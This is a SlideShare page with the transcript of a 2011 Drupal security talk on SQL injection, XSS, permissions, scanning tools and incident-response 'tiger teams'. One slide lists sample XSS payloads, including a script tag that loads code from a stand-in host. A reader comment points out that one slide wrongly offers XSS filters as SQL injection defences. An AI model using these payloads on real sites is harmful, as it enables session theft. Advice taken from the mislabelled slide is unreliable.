Drupal Camp Atlanta 2011 - Drupal Security
Upcoming SlideShare
Loading in...5
×
 

Drupal Camp Atlanta 2011 - Drupal Security

on

  • 3,320 views

Introduction to security on Drupal and introduces some testing tools, common problems and solutions.

Introduction to security on Drupal and introduces some testing tools, common problems and solutions.

We also introduce the concept of a response team and best practices to get you started.

Statistics

Views

Total Views
3,320
Views on SlideShare
3,294
Embed Views
26

Actions

Likes
2
Downloads
22
Comments
1

3 Embeds 26

http://paper.li 22
http://a0.twimg.com 2
http://www.onlydoo.com 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Slide 5 shows sanitizing 'inputs' as a solution to sql injection.
    1) Drupal sanitizes on output, not input.
    2) the functions shown are for combatting XSS, not sql injection.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Talk about noexec / nosuid
  • What is a web application firewall?
  • What is a tiger team. A tiger team is a group of experts assigned to investigate and/or solve technical or systemic problems.  The term may have originated in aerospace design but is also used in other settings, including information technology and emergency management.[citation needed] According to a 1964 definition,  "In case the term 'tiger team' is unfamiliar to you, it has been described as 'a team of undomesticated and uninhibited technical specialists, selected for their experience, energy, and imagination, and assigned to track down relentlessly every possible source of failure in a spacecraft subsystem." The term used by Rockwell Collins for a roaming installation team. It is believed that they came up with the term "Tiger Team" - source, wikipedia.
  • As part of the tiger team Identify contact points for out of hours.  Setup a mailing list for all team members. Provide all contact numbers for external resources to the team. Access to communications plan and any associated documents. Identify a chain of command, escallating issues down the chain. Schedule daily response meetings during the investigation. Establish a communication plan for the team to keep all stake holders informed. Have a web page on your intranet. Flag emails with an incident response code, so they can be collated by legal. Setup communication plan for employees so they know how to respond if contacted by the press. Manage disclosure between employees and the public. Team members will keep their own departments apprised of the status of the investigation. Appoint a team leader, dedicated to the task.
  • Corporate Communication Plan - Different levels according to scope of the breach - Internal staff, how to respond to requests for information from reporters, bloggers etc. - Prepared press statement. - Single point of contact, usually your corporate communications manager. - Consult with authorities before communicating anything to the public How prepared is your information technology (IT) department or administrator to handle security incidents? Many organizations learn how to respond to security incidents only after suffering attacks. By this time, incidents often become much more costly than needed. Proper incident response should be an integral part of your overall security policy and risk mitigation strategy.
  • Shutting down the server can execute code to clean evidence, powering down is much safer and preserves evidence.

Drupal Camp Atlanta 2011 - Drupal Security Drupal Camp Atlanta 2011 - Drupal Security Presentation Transcript

  • Locking down Drupal and  managing security breaches By Andy Thornton Mediacurrent Consultant Twitter: @BohemianPixel [email_address]
  • Overview
    • Slides will be made available at the end of the presentation
      • Common Security Issues
      • Drupal Best Practices
      • Testing Tools
      • Web Application Firewalls
      • Tiger Teams
      • Planning and Policies
      • Managing a security breach.
      • Resources
      • Questions
  • What is SQL Injection
    • In it's simplest form ..
    Example SQL Statement: statement = "SELECT * FROM users WHERE name = '" + userName + "';" But what would happen if they added something else to their name, something we didn't plan for ..
  • even more simply ...
  • Handling SQL Injection
    • Drupal makes it easy.
      • check_plain()
      • check_markup()
      • filter_xss()
      • filter_xss_admin()
    • Bad: 
    • $username=$node->field_uname[0][‘value’];
    • Good: 
    • $username=check_plain($node->field_uname[0][‘value’]);
    • Tip : Don't forget this with other forms of input, such as arguments passed in the URL.
    Sanitise your inputs
  • SQL Injection
    • Drupal 6
      • db_query()
      • db_rewrite_sql()
    • Bad:
    • $result = db_query("SELECT * from {users} WHERE name = $myvar");
    • Good:
    • $result = db_query(“SELECT pass FROM {users} WHERE name = ‘%s’, $myvar);
    • Drupal 7 Example:
    • $result = db_query(“SELECT nid, title FROM {node} WHERE type = :type”, array(
    • ‘ :type’ => ‘page’,
    • ));
    Writing secure queries based on inputs
  • What is Cross Site Scripting?
    • Cross-site scripting holes are vulnerabilities where a user can inject malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page-content, session cookies, and a variety of other information maintained by the browser on behalf of the user.
  • What just happened?
    • The script from the previous slide doesn't do anything in Chrome, but when I open the page in Firefox or IE ....
  • More Examples...
    • Don't try these out on your site.
      • ¼script¾alert(¢XSS¢)¼/script¾
      • <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></object>
      • <IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;>
      • <SCRIPT a=&quot;>&quot; SRC=&quot;http://www.dodgysite.com/xss.js&quot;></SCRIPT>
      • <A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;>XSS</A>
      •   <A HREF=&quot;javascript:document.location='/logout'&quot;>XSS</A>
  • Protection from XSS
    • Never allow &quot;Full HTML&quot; on your posting Input filter for general users.
    • filter_xss($string, $allowed_tags = array('a', 'em', 'strong', 'p'))
    • Wrap you content with
    •  
      • filter_xss()
      • check_plain()
      • check_markup()
    • Examples:
    • <body class=&quot;<?php print check_plain($_GET['parameter']); ?>&quot;>
    • Rule of Thumb
    •   Never trust user input.
    •   You can take user input, check it against a reference list and use resulting output to print the actual data.
  • Permissions
    • chmod , changes permissions on a file depending on who the user is, which groups they are members of, or how the rest of the world can interact with it.
    • Supports +/- , so
    • chmod o-w myfile
    • This example removes the ability for the world to edit the file making it read only.
    chown , changes ownership of the file or directory. For drupal we would give the world (Apache) read only access to our settings.php, but let the user own the rest of the directory chmod 400 settings.php chown www-data:www-data settings.php
  • Social Engineering Meet Kevin Mitnick Master of Social  Engineering. http://mitnicksecurity.com/ It seems to be a universal truth that most people don't believe Social Engineering (gaining information by deceit) could be so easy. &quot;No one could be that stupid&quot; is a common phrase heard from people who first learn how these types of attacks work.  However, once demonstrated (especially with some personal information of theirs) they become hard and fast believers. Just seeing it in action brings home the reality that information can leak through most any worker and that one must always be on guard. 
  • Couple of one-liners ...
    • Nosuid / Noexec
    • Set up /site/default/files and /tmp on their own partitions.
    • /dev/sda3 /home/andy/public_html/sites/default/files ext3 defaults,nosuid
    • Set wgetrc to not save downloads.
    • delete_after = on
    • Regular Security Scans against code.
    • Use a tool like openvas / RATS or a web application firewall such as WhiteHat sentinal.
    • Limit who has access to your code base and server.
    • Don't let vendors have more access than they need
    • Code for what you expect.
    • Stop playing whack-a-mole and take ownership of your code. 
  • Web Application Firewalls
  • Handy Tools to know
    • Opensource Tools
      • Openvas
      • R.A.T.S.
      • Tripwire
      • NAXSI
    • Commercial
      • Web Inspect (HP)
      • Whitehat (WAF)
      • Barracuda (WAF)
      • Imperva (WAF)
    • Command Line Warriors
      • lsof
      • grep
      • find
    • Web Application Firewalls
      • NAXSI  
      • Armorlogic
      • Array Networks 
      • Barracuda Web Application Firewall
      • Cisco
      • Citrix NetScaler
      • F5 Networks
      • Fortinet
      • ModSecurity
      • Radware
      • SonicWALL
      • Imperva
      • WhiteHat Security
  • Tiger Teams
    • “ It is better to  BE  ready, than to GET ready.”
  • What is a tiger team?
    • Who's on it and why?
      • IT Department.
      • Website Technical Lead (or project manager)
      • Management stakeholders.
      • Marketing & Corporate Communications team
      • Legal Department.
    • Trivia note: Microsoft refers to a Tiger Team as &quot; C ore C omputer S ecurity I ncident R esponse T eam&quot; or CCSIRT for short. They have a good article on Technet on roles in a Tiger...<oops> CCSIRT team. http://technet.microsoft.com/en-us/library/cc700825.aspx
    The term originated in aerospace design but is also used in other settings, including information technology and emergency management. According to a 1964 definition,  &quot;It has been described as a team of undomesticated and uninhibited technical specialists, selected for their experience, energy, and imagination, and assigned to track down relentlessly every possible source of failure in a spacecraft subsystem.&quot; - wikipedia
  • What do they do?
    • Have access to contact points for out of hours members of the team / stakeholders & third parties.  Setup an email for the team. (eg: tiger@mycompany.com)  Access to communications plan and any associated documents.
    • Secure area of network for collating evidence and documentation. Identify a chain of command, escalating communication down the chain. Schedule daily response meetings during the investigation. Establish a communication plan for the team to keep all stake holders informed. 
    • Flag emails with an incident response code, so they can be collated by legal or include tiger email. Setup communication plan for employees so they know how to respond if contacted by the press. Manage disclosure between employees and the public. Team members will keep their own departments apprised of the status of the investigation. Appoint a team leader, dedicated to the task they are prime contact for the management team.
  • Always have a plan
      • Corporate Communication Plan.
      • Incident Response Worksheet.
      • Prepared Press release.
      • Internal Communication Policy. (loose lips, sink ships)
      • Communication list of internal stakeholders.
      • Appoint a single point of contact for inquiries.
      • Collect contact numbers for everyone involved and all third party resources.
      • Have a secure place put set aside on your network / Intranet.
    &quot;I have a plan so cunning you could stick a tail on it and call it a weasel&quot; - Lord Edmund Blackadder
  • Always remember ...
    • Sanitise your in/output.
    • Use Drupal methods,
    • Keep your site up to date.
    • Have a plan in place.
    • Audit your code.
    • Never, never hack core.
    • Or Dries will send out creatures from Acquia's secret lab specifically trained to hunt Kittens ...
  • Handling a security breach
  • First Off
  • Unleash the Tigers
  • Activate your CSIRT .. Tiger Team!
      • Start the clock.
      • Pull the plug, don't shut it down.
      • Redirect to a static page from a DNS level.
      • If possible, take a copy of the disk and store it offline.
      • Get the authorities involved the moment you have verified data has been compromised.
      • Don't use a backup without knowing the cause of the attack.
      • Don't change passwords or try and fix files.
      • If the filesystem was compromised, don't trust that server build.
      • Investigate in parallel to the authorities.
    Follow your workflow and communication plan.
  • Resources
    • Security Team: 
    • http://drupal.org/node/32750 
    • Security advisories: 
    • http://drupal.org/security
    • Secure Text Handling:
    • http://drupal.org/node/28984
    • Writing Secure Code:
    • http://drupal.org/writing-secure-code
    • Responding to IT Security Incidents
    • http://technet.microsoft.com/en-us/library/cc700825.aspx
    • Slides http://bit.ly/dca-security  
    Secret Service Atlanta Electronic Crimes Task Force 404-331-6111 Email:  [email_address]
  • Questions?